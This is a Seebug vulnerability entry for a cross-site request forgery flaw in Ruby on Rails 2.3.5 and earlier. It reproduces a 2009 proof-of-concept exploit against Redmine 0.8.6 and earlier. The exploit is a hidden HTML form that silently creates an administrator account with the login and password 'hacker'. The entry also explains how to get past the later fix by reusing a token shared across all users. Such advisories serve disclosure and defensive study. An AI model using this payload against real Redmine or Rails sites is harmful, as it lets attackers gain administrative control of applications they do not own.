Ruby on Rails <= 2.3.5 'protect_from_forgery' Cross Site Request Forgery Vulnerability

ID SSV:86624
Type seebug
Reporter Root
Modified 2014-07-01T00:00:00


No description provided by source.


Ruby on Rails is prone to a cross-site request-forgery vulnerability.

Exploiting this issue may allow a remote attacker to perform certain administrative actions, gain unauthorized access to the affected application, or delete certain data. Other attacks are also possible. 

*  Redmine <= 0.8.6 CSRF Add Admin User Exploit
*  Discovered by: p0deje (
*  Application:
*  SA:
*  Date: 13.11.2009
*  Versions affected: <= 0.8.6
*  Description: this is a simple exploit which exploits CSRF vulnerability in Redmine, it creates user account with adminstartive rights
    <form method=POST action="">
       <input style="display: none" type="text" value="hacker" size="25" name="user[login]" id="user_login"/>
       <input style="display: none" type="text" value="hacker" size="30" name="user[firstname]" id="user_firstname"/>
       <input style="display: none" type="text" value="hacker" size="30" name="user[lastname]" id="user_lastname"/>
       <input style="display: none" type="text" value="" size="30" name="user[mail]" id="user_mail"/>
       <input style="display: none" type="password" size="25" name="password" id="password" value="hacker" />
       <input style="display: none" type="password" size="25" name="password_confirmation" id="password_confirmation" value="hacker" />
       <input style="display: none" type="checkbox" value="1" name="user[admin]" id="user_admin"/>
       <input style="display: none" type="hidden" value="1" name="user[admin]"/>
       <input style="display: none" type="submit" value="Create" id="commit" name="commit" />
*  P.S. Actually, this vulnerability wasn't fixed in Redmine 0.8.7, because token was generated one time for all the pages and allthe users.
*  Thus, you can add POST data with token of any user and exploit will be working again